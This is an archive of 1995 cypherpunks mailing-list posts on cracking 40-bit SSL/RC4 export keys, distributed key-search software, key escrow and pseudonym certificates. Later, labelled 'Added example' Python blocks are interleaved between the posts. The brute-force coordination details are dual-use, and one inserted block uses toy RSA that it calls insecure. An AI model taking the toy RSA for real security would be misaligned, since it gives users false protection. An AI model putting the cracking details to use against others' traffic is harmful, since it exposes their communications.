On Fri Aug 18 03:51:20 1995: you scribbled...
> 
> Mr. Shank - I'm a bit disappointed by your posting about the RC4-40 crack.

<stuff deleted>

After following the threads that have gone on after the SSL/RC4 cracking, 
it seems that we are going about this all wrong.  The cypherpunks and
Netscape shouldn't be at odds about this event.  It would be in everyone's
best interest to join forces against the common foe (ITAR), and try to
prove to the feds that RC4-40 just plain isn't good enough.  

For example, if Netscape (or someone else) were to issue a challenge to
break an SSL Key as fast as possible, and then the cypherpunks did just
that in say...a few hours, it could make a very big statement.  

It seems that one of the problems with Damien's cracking job was that it
was "not sanctioned".  Look at the WSJ article, they didn't mention his
name...they just called him "a hacker".  It shows how public opinion still
sees groups like the cypherpunks as just that, a bunch of punks. 

With some "respected" business on our side, it may make a much bigger
impact (better publicity, better leverage, etc.).

Maybe I'm just dreaming...

...tango...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 12:00:45 PDT
To: mfroomki@umiami.ir.miami.edu (Michael Froomkin)
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <Pine.3.89.9508181423.A623131443-0100000@umiami.ir.miami.edu>
Message-ID: <9508181854.AA02742@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| I have a question which is of course purely hypothetical.

[Description of a certificate with no backing deleted.]

| Is there any reason why a person would want such a certificate?  In other 
| words, given that the recipient of a digital signature will easily be 
| able to check the value of the certificate (nil), won't the 
| transaction/communication be in all ways identical to one where there was 
| no certificate at all.  So is anything of value lost by prohibiting such 
| a certificate?

	I'll turn the question around, and ask, is anything of value
gained by prohibiting such a thing?  If not, why not let people pay
for worthless things, should people so desire?

	Does the Government have a duty to prevent us from wasting our
time or money?

	On another tack, I'll say, yes, there is something of value
lost, and that is the easy creation of pseudonyms.  Pseudonyms are
useful for the creation of a persistent, although untraceable
identity.  Having those identities in the certification tree is, I
suspect, as good a thing as the CA as a whole.  

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 12:02:59 PDT
To: koontz@MasPar.COM (David G. Koontz)
Subject: Re: Netscape security
In-Reply-To: <9508181832.AA21899@argosy.MasPar.COM>
Message-ID: <9508181856.AA02769@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| One tends to wonder if there are analytical methods to reduce the search
| space.

	I suspect that the PRNG used by Netscape navigator might yield
up some clues if someone were to disassemble it.  One might see if
secret_key_data and public_key_data are derived from the same seeds.


Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 18 Aug 95 12:03:14 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508181449.A623131443-0100000@umiami.ir.miami.edu>
Message-ID: <199508181902.PAA03032@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> On Fri, 18 Aug 1995, Perry E. Metzger wrote:
> > > The credit card market has thin margins?  That's news to me.
> > 
> > Its true. The issuers often end up making most of their money for a
> 
> actually the NYT reported this week that banks make super-profits on 
> credit cards.  economists are not sure why the margins are about 3 times 
> that of other lines of biz.

The overall business is very profitable. The margins on transactions
are very thin.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Mon, 21 Aug 95 21:16:19 PDT
To: cypherpunks@toad.com
Subject: Re: Article in Time Magazine
Message-ID: <199508220416.AA03981@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain



> How many exported software products might have backdoors,
> vulnerabilities, and hidden procedures which are harmfull if ever
> activated?

I am not saying it is so; I am just speculating.

Windows ?

Microcode of big host systems like the one from IBM?

Each mainframe comes with a line attached. Customers
typically don't have the faintest idea what is going on 
that line. I know one customer who stuck a printer 
there and thought - now we will see ... well he ended
up with printouts he did not have the faintest idea
of their context.

Now does anyone have real evidence of possible
backdoors?

Best Regards
Kari
Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Fri, 18 Aug 95 07:07:30 PDT
To: cypherpunks@toad.com
Subject: Re:  Cost to Crack Keys
Message-ID: <9508181407.AA07951@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


This is how you can crack SSL RC4-40 sessions for $1000 each:

Go to your bank and get a $250,000 loan over 10 years.  Assuming a 10%
interest rate, you will have to pay about $40,000 per year.  Use the
$250,000 to buy 50 low-cost high-speed pentium PCs.  Don't bother with
a screen, keyboard or mouse.  Get the minimum of memory.  Get a huge
discount (you're a really good client).

Pay $10,000 for the electricity bill, the real-estate rent, etc.

The machines will crack 50 keys per year on average.  They cost you
$50,000 per year.

That's $1,000 per key.

Does anyone see any hole in the above plan ?  It seems to me that
Netscape's estimate is one order of magnitude too high.

-- Damien
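
Added example, not part of Damien Doligez's message: the plan above as a small Python cost model. The loan, interest rate, overhead, machine count and 50-keys-per-year figures are the message's; the per-machine trial rate is derived from them rather than quoted, and pricing other key lengths is a generalization that assumes the same hardware and yearly cost.

```python
"""Cost-per-key model for exhaustive key search (added example)."""

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def annual_loan_payment(principal, rate, years):
    """Level yearly payment that repays `principal` at interest `rate` over `years`."""
    if rate == 0:
        return principal / years
    return principal * rate / (1 - (1 + rate) ** -years)


def implied_trial_rate(key_bits, keys_per_machine_year):
    """Trials per second one machine must sustain to average that many keys a year.

    On average the key turns up after half the keyspace has been searched.
    """
    return keys_per_machine_year * 2 ** (key_bits - 1) / SECONDS_PER_YEAR


def keys_per_year(key_bits, machines, trials_per_second):
    """Expected number of keys recovered per year by the whole farm."""
    return machines * trials_per_second * SECONDS_PER_YEAR / 2 ** (key_bits - 1)


def cost_per_key(key_bits, plan):
    """Yearly cost (loan repayment plus overhead) divided by keys found per year."""
    yearly = annual_loan_payment(plan["loan"], plan["rate"], plan["years"])
    yearly += plan["overhead"]
    return yearly / keys_per_year(key_bits, plan["machines"], plan["trials_per_second"])


# Figures from the message; trials_per_second is derived from "50 machines,
# 50 keys per year", it is not a number the message states.
PLAN = {
    "loan": 250_000,
    "rate": 0.10,
    "years": 10,
    "overhead": 10_000,
    "machines": 50,
    "trials_per_second": implied_trial_rate(40, keys_per_machine_year=1),
}

if __name__ == "__main__":
    print(f"loan payment per year : ${annual_loan_payment(250_000, 0.10, 10):,.0f}")
    print(f"implied trials/second : {PLAN['trials_per_second']:,.0f} per machine")
    for bits in (40, 48, 56, 64, 128):
        print(f"{bits:3d}-bit key: ${cost_per_key(bits, PLAN):.3g} per key")
```

Every added key bit doubles the price, which is why the same farm that makes 40-bit keys cheap says nothing against 128-bit keys.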




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Conlen <meconlen@IntNet.net>
Date: Fri, 18 Aug 95 13:16:51 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508181449.A623131443-0100000@umiami.ir.miami.edu>
Message-ID: <Pine.SV4.3.91.950818160146.15493A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Michael Froomkin wrote:

> On Fri, 18 Aug 1995, Perry E. Metzger wrote:
> > > The credit card market has thin margins?  That's news to me.
> > 
> > Its true. The issuers often end up making most of their money for a
> 
> actually the NYT reported this week that banks make super-profits on 
> credit cards.  economists are not sure why the margins are about 3 times 
> that of other lines of biz.

That's the business of banking. In any case most businesses run tight net 
margins. Over half of the gross margin in Retail Electronics disappears, 
and in some markets like Los Angeles, it's as low as 6 or 7 percent.

The credit card companies don't have a whole lot to worry about other than 
public image, and only a few like American Express worry about this 
a lot. A large portion of phone calls paid for by credit cards are 
declined for payment. It's the establishment that didn't check the person 
using the card that loses out. Mail order businesses take the loss when a 
computer is carded, because they don't have a signature on hand to back up 
the charge. The credit card company doesn't take the hit at all. American 
Express is the toughest of all the companies that I have dealt with. While 
I can steal a card in the mail, sign it, and use it, in which case the 
person who the card was intended for can be held liable for the bill, 
AmEx requires that the person whose name is on the card sign for the 
charge. Basically what it comes down to is, card companies and banks don't 
take the hit unless they want to for public image and customer service. 
What do they care if their card is being used by someone who shouldn't 
have it? They can decline payment at will without a signature. 

I in some ways hope using credit cards on the net takes off, is abused, 
and people go back to using cash, and checks, and buying things in 
person. 


						Groove on Dude
						Michael Conlen
						meconlen@intnet.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 13:23:58 PDT
To: ic58@jove.acs.unt.edu (Childers James)
Subject: Re: Cypherpunks' ideal escrow agent
In-Reply-To: <Pine.SOL.3.91.950818144033.6796A-100000@jove.acs.unt.edu>
Message-ID: <9508182017.AA03042@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| I've seen the idea of voluntary key escrow discussed before on this list. 
| (And no, not the government's idea of "voluntary", either.) A question I 
| would raise is this: What would be the ideal setup for an escrow agency? 
| If I were to open up an agency for business, what would be some 
| characteristics you would look for?

	From the top down:

	I'd want to see a board of directors with several well known,
well respected cypherpunks on it.  I wouldn't trust 'Joe the
cypherpunks' escrow agency any farther than I could throw it, because
I expect the FBI and NSA will both set them up as stings.

	I'd want to see it well financed; legal fees will not be small
if the KEA is really on my side.

	A few good technical people involved to make sure that the
actual key databases are well encrypted and protected, and that
individual keys can be extracted without extracting an entire
database.  If I was actually going to extract keys, I'd want to see a
two or three passphrase extraction procedure, so that there's no single
point of bribery/extortion.

	A nice location in an offshore banking haven.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
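
Added example, not part of Adam Shostack's message: one way to get the two technical properties asked for above, a multi-passphrase extraction procedure and release of one key without opening the whole database. The three-custodian setup, the names `EscrowVault`, `release_key` and `extract`, and the HMAC-SHA256 keystream (a standard-library stand-in for an authenticated cipher) are assumptions of this sketch.

```python
"""Escrow store with split control and per-record keys (added example)."""
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000  # constructed parameter for the example


def master_secret(passphrases, salt):
    """Combine every custodian's passphrase, in the agreed order; all are needed."""
    h = hashlib.sha256()
    for i, phrase in enumerate(passphrases):
        share = hashlib.pbkdf2_hmac("sha256", phrase.encode(), salt + bytes([i]),
                                    PBKDF2_ROUNDS)
        h.update(share)
    return h.digest()


def record_key(master, record_id):
    """Per-record key: handing it over exposes one escrowed key, not the database."""
    return hmac.new(master, b"record:" + record_id.encode(), hashlib.sha256).digest()


def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        block = b"enc" + nonce + counter.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def _tag(key, record_id, nonce, ciphertext):
    data = b"mac" + record_id.encode() + nonce + ciphertext
    return hmac.new(key, data, hashlib.sha256).digest()


def seal(rkey, record_id, secret):
    """Encrypt then authenticate one escrowed key under its record key."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(secret, _keystream(rkey, nonce, len(secret))))
    return nonce + ct + _tag(rkey, record_id, nonce, ct)


def open_record(rkey, record_id, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, _tag(rkey, record_id, nonce, ct)):
        raise ValueError("wrong key or tampered record")
    return bytes(a ^ b for a, b in zip(ct, _keystream(rkey, nonce, len(ct))))


class EscrowVault:
    def __init__(self, salt):
        self.salt = salt
        self.records = {}  # record id -> sealed blob

    def deposit(self, passphrases, record_id, secret):
        rkey = record_key(master_secret(passphrases, self.salt), record_id)
        self.records[record_id] = seal(rkey, record_id, secret)

    def release_key(self, passphrases, record_id):
        """Custodians' step: every passphrase present, output covers ONE record."""
        return record_key(master_secret(passphrases, self.salt), record_id)

    def extract(self, rkey, record_id):
        """Operator's step: needs only the released record key."""
        return open_record(rkey, record_id, self.records[record_id])
```

The operator who performs the extraction never sees a passphrase or the master secret, so bribing or coercing that one person yields at most the record already being released.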





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Cheng <howard@cs.ualberta.ca>
Date: Fri, 18 Aug 95 15:29:56 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Economic Model for Key Cracking
In-Reply-To: <v02120d07ac5ac3256b91@[199.2.22.120]>
Message-ID: <95Aug18.162938-0600_mdt.13069-7+113@scapa.cs.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes wrote:
> 
> At the same time, many people and companies have lots of unused CPU
> time on their hands. Economically, this CPU time is scrap material --
> and there are companies out there that do nothing but buy up scrap
> equipment for pennies on the dollar.
> 
> Therefore it should be possible to create a market in spare CPU cycles
> for tasks like this that require massive parallel computing. An
> earlier suggestion for bounties on keys (basically the Chinese lottery
> approach) is a step in this direction.
> 

One can set up a workload distributor this way:

 Distribute work when a request is received.
 When the final results come back, pay the worker e-cash.

We need to make sure that someone did do the work honestly, but I don't know
how to check this (other than doing the work yourself to confirm the results,
but this defeats the whole point of the system).  Perhaps we should require
that people buy the work first, and when they report the results, they get 
the money back + some profits.  

Assuming everyone is honest, I am sure many people in businesses
wouldn't mind making money this way.  Most business machines are
completely idle/turned off after working hours anyway.

Now we just need to convince the business people to help us.  Not
everyone is honest, and so this may be a bit difficult to do.  If I
were a business person without much computer knowledge, I probably
wouldn't trust someone running programs on my computer.  What if the
program scans all my business secrets and distributes them world-wide,
or what if the program is some sort of a virus?  I could get some
computer consultants to check the program's source code, but this
would be too much trouble.

Anyway, I think this would be the attitude of an average business
person.  Therefore, it will not be very easy to convince a lot of
people to donate their spare cycles.

Howard

-- 
Howard Cheng                     e-mail: hcheng@gpu.srv.ualberta.ca
University of Alberta                    howard@cs.ualberta.ca
3rd year Honors Comp. Sci.       URL   : http://ugweb.cs.ualberta.ca/~hcheng
Finger hcheng@amisk.cs.ualberta.ca for PGP public key.

Algebraic symbols are used when you do not know what you are talking about.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 13:40:53 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508181854.AA02742@joplin.harvard.edu>
Message-ID: <Pine.3.89.9508181654.A623135137-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Adam Shostack wrote:

> 	I'll turn the question around, and ask, is anything of value
> gained by prohibiting such a thing?  If not, why not let people pay
> for worthless things, should people so desire?
> 
because you have to pick your fights. If nothing's lost, there are other 
fish to fry.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 16:45:16 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <199508182342.QAA20924@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 PM 8/18/95 -0400, Michael Froomkin writes about CAs,
and asks why a CA or customer would want a certificate for
a pseudonym without any identification or True Name.
>given that the recipient of a digital signature will easily be 
>able to check the value of the certificate (nil), won't the 
>transaction/communication be in all ways identical to one where there was 
>no certificate at all.  So is anything of value lost by prohibiting such 
>a certificate?

It's useful for a couple of reasons 
1) Continuity - For a single transaction, it doesn't make much difference;
for multiple transactions/communications it does.  
If you want to use the nym JohnDoe, and you register with keys.com, 
you can do repeated transactions (e.g. posting to the net) as JohnDoe/keys.com,
and nobody can impersonate you as long as keys.com doesn't allow duplicates.
This allows people to build reputations under pseudonyms, and do repeat
business or have readers bother to read their postings.

Without certification (whether web-based or hierarchy-based),
you're stuck with always posting your messages with a given key
and hoping people can decide whether they've really got yours or
some other JohnDoe.  Our local Black Unicorn is this way - 
few of us know his True Name, but his reputation is established.
On the other hand we can't really tell if the many postings by the
L-Name are from a single person, a cooperating group, or imposters
who decided it would be fun to borrow his reputation for the day.
Tim May has occasionally proposed that the key is really all that matters,
and that the name tacked onto it is just an untrustable convenience, but I'd
say that certification does increase that convenience by adding some trust. 

2) Policy-vs-Mechanism - Realistically, there'll be software out there
that wants an Official CA-approved certificate to talk to anyone.
If nobody's willing to give certificates to nyms, then nyms can't participate.

3) What's your definition of "prohibit"?  If you mean "Keys.com decides
not to offer the service", they lose the cash they might have made
selling certificates to nyms, lose some customer goodwill, but maybe gain
an improved reputation in other parts of the market, and JohnDoe can
always go to Nyms-R-Us.org and register as JohnDoe32767.
If you mean "the government should ban it", I've done enough anarchist ranting
about how that sort of thing degrades society :-)
However, if you mean "The Certificate Authority Cabal should agree not to
offer any certificates without real ID and contractually forbid lower-level
certifiers to do it either", well, it's a sad thing for society,
but they can do it if they want.  You lose the ability to participate as a nym,
you lose privacy, you lose the value that you might have gained by
transactions with people who wanted to retain their anonymity.

RSA does offer persona certificates to unauthenticated people.
(Also see my follow-on message about my offer to sign PGP keys for nyms.)

4) Are there negatives about dealing with unattributable pseudonyms?  Of course.
But you don't have to deal with them, and there will be CAs who don't,
and services that refuse to deal with unauthenticated pseudonyms,
just as there are on-line services like the Well that allow "unlisted"
identifications but do keep track of true names for their users.
It would be nice if certification authorities did indicate how much trust
they have in the identity of a given key's owner, but markets will take
care of that.


                Thanks;  Bill Stewart
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 16:46:51 PDT
To: cypherpunks@toad.com
Subject: PGP Certification Service for Pseudonyms
Message-ID: <199508182342.QAA20975@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Time to stretch some paradigms :-)
I've decided to offer a service of certifying PGP keys for Pseudonyms.
Normally, it only makes sense to sign PGP keys for people you can
trust to really be who they say they are, but this means you can't
sign keys for people who want to use pseudonyms, which would be a Good Thing.
To try and retain a certain amount of trust in the process,
here's my policy for doing so:

0) I only sign pseudonyms with the pseudonym-signing key below,
which tries to make it clear how trustable it isn't.
1) First Come, First Served - The first user of a given name gets it,
and the only guarantee I'll make about verification is that I won't
sign more than one key with the same name unless the later key is signed
by the earlier key.
2) At least for now, keys need to indicate pseudonymity in the name.
3) If you're using a name I recognize, I might check it out with the
person I know who uses that name.  
3A) If you're claiming to be L.Detweiler, I'll want a fax of your ID :-)

Procedures:
1) Requests by email; I will mail a copy of the key to the keyserver
and to the address you sent the request from if I can.
2) Price is 1 Digicash e$, or 1 Tacky Token, or a big prime number,
or an interesting cypherpunk-related URL (well-known sites only count
if it's something new.  New code is always interesting!)
3) I'll post interesting payments to http://idiom.com/~wcs/ ,
and if it's something that takes a while to verify (e.g. I haven't
gotten my free stuff from digicash.com yet :-) and your payment bounces,
I'll probably post that too :-)
        Pseudonym John Doe sent me a composite number 897098274398742!

                                        Enjoy!   
                                               Bill 


############################################################################
1024/B57ECBC5 1995/08/18 
Bill Stewart Unauthenticated Pseudonym Signing Key <stewarts@ix.netcom.com>
PGP-Fingerprint: 70 96 C9 B8 38 05 61 0C  A5 30 D0 82 7A 74 16 15


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQBVAwUBMDUk2fthU5e7emAFAQEqZwH/ZOGPWCOldIsueBZWbmSAEGcXoUlXqJNS
8DoFNO0W1qs7+2kcKxM55UahdcOdaJe/lTbtf2PLgRmEzkV2mYLSyw==
=kpgd
-----END PGP SIGNATURE-----
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 18 Aug 95 09:08:43 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: Where is the key cracking farming software?
Message-ID: <14470.9508181605@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey <dan@milliways.org> writes on cpunks:
> There must be several versions of the code at this point.  The
> Cypherpunks release, Damien's release and whoever else wrote some code
> to do the chore.  If someone could pass me a pointer to the version
> that's best-commented and most understandable (one man's C is another
> man's crypto) I'd like to port it to Windows NT and write a simple
> installation to install it as a service.

Yep there's lots of versions of the brutessl software, ones I know of
(in no particular order):

- Damien Doligez wrote one
- Andrew Roos wrote one (this is the one we're using for the challenge)
- Eric Young wrote one
- I wrote one

More related software, specifications, etc.

- Piete Brookes, Andy Brown, and I wrote a protocol specification for
  a SMTP style key doler - SKSP (Simple Key Search Protocol) - draft
  RFC like document on brute (www url below).

- Piete wrote a unix socket based key server and client for generic
  unix machines (in perl).

- Andy Brown wrote a Windows NT client which talks the same protocol

- David Byers did a MasPar port of the brutessl code

> 	Perhaps a general-purpose OO bruteforcing library (addition to
> Crypto++?) would be a good idea.  Just pass a pointers to the
> encrypt() and decrypt() functions to use for this session to the
> Cracker object, which in turn takes a number of bits and starts
> cracking.:)

The socket based key distributer allows you to write clients which
interact with the key server.  Take a look at Andy's code.

> 	The problem with this is the disparity among out-of-the-box encrypt
> and decrypt functions.  But I suppose it's nothing that couldn't be
> overcome with wrapper functions.  Just thinking out loud. :)

Not sure how Andy addresses this in the NT code (I don't have NT), but
for the unix client you'd just get another brute force program,
compile it and update the client.

Piete has a WWW URL for the software (the protocol spec is there too) at:

	http://www.brute.cl.cam.ac.uk/brute/

(Brute is a subsubdomain he set up for the purpose).

Also this:

	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/

should work.

And the socket server runs on: sksp.brute.cl.cam.ac.uk (port 19957).

I think we're ready to start another challenge, this one a
collaborative project like the brute rc4 one.  Just need some
challenges now (asked Hal about this).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 17:13:57 PDT
To: cypherpunks@toad.com
Subject: Re: PGP Certification Service for Pseudonyms
Message-ID: <199508190011.RAA26902@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In my announcement about Pseudonym Signing Service, I forgot to type Rule 4)
4) Any messages requesting signatures for keys must be signed by the key
requesting the signature (both the key and the email message need to be
signed...)

                Thanks;  Bill
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry

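Added example, not part of Bill Stewart's messages: the signing policy from the "PGP Certification Service for Pseudonyms" announcement (rules 1 and 2) and the Rule 4 follow-up above, written as a registrar that accepts or refuses requests. Textbook RSA over fixed primes stands in for PGP keys and is not secure; the "pseudonym" marker word, the request format, and reading "earlier key" as the key currently certified for the name are assumptions of this sketch.

```python
"""Pseudonym-signing policy as a checkable registrar (added example)."""
import hashlib

MARKER = "pseudonym"  # assumption: the word a name must contain (rule 2)


def toy_keypair(p, q, e=65537):
    """Textbook RSA from two known primes: a toy stand-in for a PGP key, NOT secure."""
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))


def _digest(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(priv, data):
    n, d = priv
    return pow(_digest(data, n), d, n)


def verify(pub, data, sig):
    n, e = pub
    return isinstance(sig, int) and 0 <= sig < n and pow(sig, e, n) == _digest(data, n)


def normalise(name):
    """Fold case and whitespace so 'John  Doe' and 'john doe' are the same name."""
    return " ".join(name.lower().split())


def binding(name, pub):
    """The bytes that tie a name to a key; every signature here covers them."""
    return f"{normalise(name)}|{pub[0]:x}|{pub[1]:x}".encode()


def make_request(name, pub, priv, earlier_priv=None):
    """Requester side: self-signed key, signed message, optional rollover signature."""
    bound = binding(name, pub)
    return {
        "name": name,
        "pub": pub,
        "self_sig": sign(priv, bound),
        "request_sig": sign(priv, b"sign-request:" + bound),
        "rollover_sig": sign(earlier_priv, bound) if earlier_priv else None,
    }


class PseudonymRegistrar:
    def __init__(self, signing_priv):
        self.signing_priv = signing_priv
        self.certified = {}  # normalised name -> public key currently certified

    def handle(self, name, pub, self_sig, request_sig, rollover_sig=None):
        """Apply rules 2, 4 and 1 in turn; return (certificate or None, reason)."""
        bound = binding(name, pub)
        if MARKER not in normalise(name):
            return None, "name does not indicate pseudonymity"       # rule 2
        if not verify(pub, bound, self_sig):
            return None, "key is not signed by itself"               # rule 4
        if not verify(pub, b"sign-request:" + bound, request_sig):
            return None, "request is not signed by the key"          # rule 4
        holder = self.certified.get(normalise(name))
        if holder not in (None, pub) and not verify(holder, bound, rollover_sig):
            return None, "name taken and new key not signed by earlier key"  # rule 1
        self.certified[normalise(name)] = pub
        return sign(self.signing_priv, bound), "signed"


if __name__ == "__main__":
    reg_pub, reg_priv = toy_keypair(2**521 - 1, 2**607 - 1)   # constructed keys
    pub_a, priv_a = toy_keypair(2**61 - 1, 2**89 - 1)
    pub_b, priv_b = toy_keypair(2**107 - 1, 2**127 - 1)
    reg = PseudonymRegistrar(reg_priv)
    print(reg.handle(**make_request("Pseudonym John Doe", pub_a, priv_a))[1])
    print(reg.handle(**make_request("pseudonym john  doe", pub_b, priv_b))[1])
```

Folding case and whitespace before the uniqueness check matters: without it a second requester could register a visually identical name and borrow the first holder's reputation.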




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 18 Aug 95 15:21:38 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Export policy change
Message-ID: <9508182218.AA04527@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  I will cheerfully escrow keys for 1$ ecash/key. Please be advised,
>  however, that key storage will be on an old 40M RLL drive on an
>  8088 machine, so retrieval may be a bit slow and unreliable.......

hey, my escrow service will store your keys on modern equipment...  Plus, I  
don't care if you encrypt your key (with still-legal, non-exportable,  
escrow-free, strong-crypto) before you escrow it.  :-)

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 18 Aug 95 14:24:04 PDT
To: Childers James <ic58@jove.acs.unt.edu>
Subject: Re: Cypherpunks' ideal escrow agent
Message-ID: <199508182122.RAA54557@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James Childers <ic58@jove.acs.unt.edu> wrote:

>I've seen the idea of voluntary key escrow discussed before on this list. 
>(And no, not the government's idea of "voluntary", either.) A question I 
>would raise is this: What would be the ideal setup for an escrow agency? 
>If I were to open up an agency for business, what would be some 
>characteristics you would look for?

Exactly what the government *doesn't* want, I'm afraid...
I would want them to honor *only* warrants which involve
crimes dealing with at least the possibility of an
individual, articulable victim.

Despite much hot wind about "terrorism" from the FBI to
the contrary, the reason for "GAK" [I liked "FUCKED" better]
is to allow prosecuting the tax-and-spend drug war
to remain possible.

Also, the temptation to ignore any warrant requirement and
screen *political* e-mail if a "minor" political party started
to gain prominence would be nearly overwhelming to any non-angels
with "real-time" decryption capability. Political debates these
days are (obviously) won by sound bite, and advisors want to be
prepared for a sound "byte" such as "tax-and-spend drug war"
[Oops, can't use that one now!] :) flying through cyberspace
toward an opponent, just as Reagan was (supposedly) prepared
for Carter's lines before their debates.
<zipping up my Nomex bodysuit now...>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDUDZ21lp8bpvW01AQFx0wP/b5c5xTxyGygbTcRJriErK9dD0ahfFXEu
SSpqmExn+E+aD6tYNQNEDS50pnT8wOI7IKQjVLGGEZKfmeZRIU7gnT0jttbHV14c
QnMGkMsEsVK3R2YkWPGavhPeJwdrwHrvYC/xUFzrtSJHQQ1u7X3LXubjS2vikcVJ
mxqfYoUympA=
=YEMs
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
------------------------------------------------------------------------
